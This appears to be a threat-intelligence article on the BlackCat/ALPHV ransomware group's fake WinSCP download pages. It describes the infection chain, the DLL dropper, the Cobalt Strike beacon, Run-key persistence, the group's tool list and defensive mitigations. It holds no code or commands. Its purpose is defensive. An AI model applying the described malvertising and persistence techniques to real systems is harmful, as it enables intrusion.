Detriments of Ransomware Threats: BlackCat’s New Attack Vector

The BlackCat ransomware group, also known as ALPHV, utilizes deceptive methods by creating fake pages that mimic the official website of the popular file-transfer application, WinSCP. Instead of legitimate downloads, these fake pages distribute malware-ridden installers.

BlackCat has emerged as a highly sophisticated and prominent ransomware group, making significant waves throughout 2021 and 2022. It gained particular attention due to its unique characteristic of being one of the first prominent malware strains written in the Rust programming language. Rust's rising popularity is attributed to its exceptional performance and strong memory safety features. BlackCat's adoption of Rust signifies the group's commitment to developing advanced and evasive malware.

Attack Vector

BlackCat targets system administrators, web administrators, and IT professionals by leveraging the popularity of the WinSCP file-transfer application. Their malvertising campaigns appear on search engines such as Google and Bing, directing users to fake pages that closely resemble the official WinSCP website. These pages are designed to trick victims into downloading malware-ridden installers.

When users search for "WinSCP Download" on search engines, the malicious ads crafted by BlackCat appear prominently above legitimate search results. Clicking on these ads redirects victims to websites that host tutorials on automated file transfers using WinSCP. While these websites initially appear harmless, they ultimately redirect victims to clone versions of the official WinSCP download page. The clone sites, such as "winsccp[.]com," entice victims to download an ISO file containing "setup.exe" and "msi.dll." The executable serves as a lure, while the DLL acts as a dropper for the actual WinSCP installer alongside a malicious Python execution environment.

Persistence and Advanced Techniques

Once the malware is executed, it proceeds to extract a Python folder from the DLL's RCDATA section, creating a legitimate-looking installer for WinSCP. The process also involves installing a trojanized python310.dll and establishing persistence by creating a run key named "Python" with the value "C:\Users\Public\Music\python\pythonw.exe." The executable pythonw.exe loads an obfuscated python310.dll that harbours a Cobalt Strike beacon, establishing a connection with a command-and-control (C2) server.

Tools and Techniques

The BlackCat ransomware group employs a variety of tools and techniques to deepen their compromise and facilitate lateral movement within compromised networks.

Some notable tools used by ALPHV include:

• AdFind for retrieving Active Directory information,

• PowerShell commands for data gathering and script execution,

• AccessChk64 for user and group permission reconnaissance,

• Findstr for searching passwords within XML files,

• PowerView for AD reconnaissance and enumeration,

• Python scripts for password recovery and credential retrieval,

• PsExec, BitsAdmin, and Curl for lateral movement,

• AnyDesk as a legitimate remote management tool abused for persistence,

• KillAV BAT script for bypassing antivirus and antimalware programs,

• PuTTY Secure Copy client for exfiltration and,

• The SpyBoy "Terminator," an EDR and antivirus disabler.

Recommended Mitigation

To mitigate the risk posed by the BlackCat ransomware group, organizations are advised to implement the following measures:

• Avoid Clicking on Suspicious Links: Avoid clicking on suspicious links, especially those received via email or found on unfamiliar websites. Emphasize the importance of verifying the authenticity of links and discourage downloading software from untrusted sources to minimize the risk of malware infection.

• Web Filtering: Deploy web filtering solutions to block access to malicious websites and malvertising campaigns.

• Security Software: Keep all security software, including antivirus and anti-malware solutions, up to date with the latest definitions.

• Patch Management: Regularly update software and operating systems with the latest security patches to address known vulnerabilities.

• Multi-Factor Authentication (MFA): Implement MFA for critical systems and user accounts to add an extra layer of security.

In conclusion, the BlackCat ransomware group, also known as ALPHV, has established itself as a formidable threat in the cybersecurity landscape. With its adoption of the Rust programming language and the ability to compromise both Windows and Linux-based systems, BlackCat poses a significant risk to organizations. While recent data suggests a decline in recorded infections, it is crucial for organizations to remain vigilant and implement robust security measures to protect against evolving ransomware threats like BlackCat.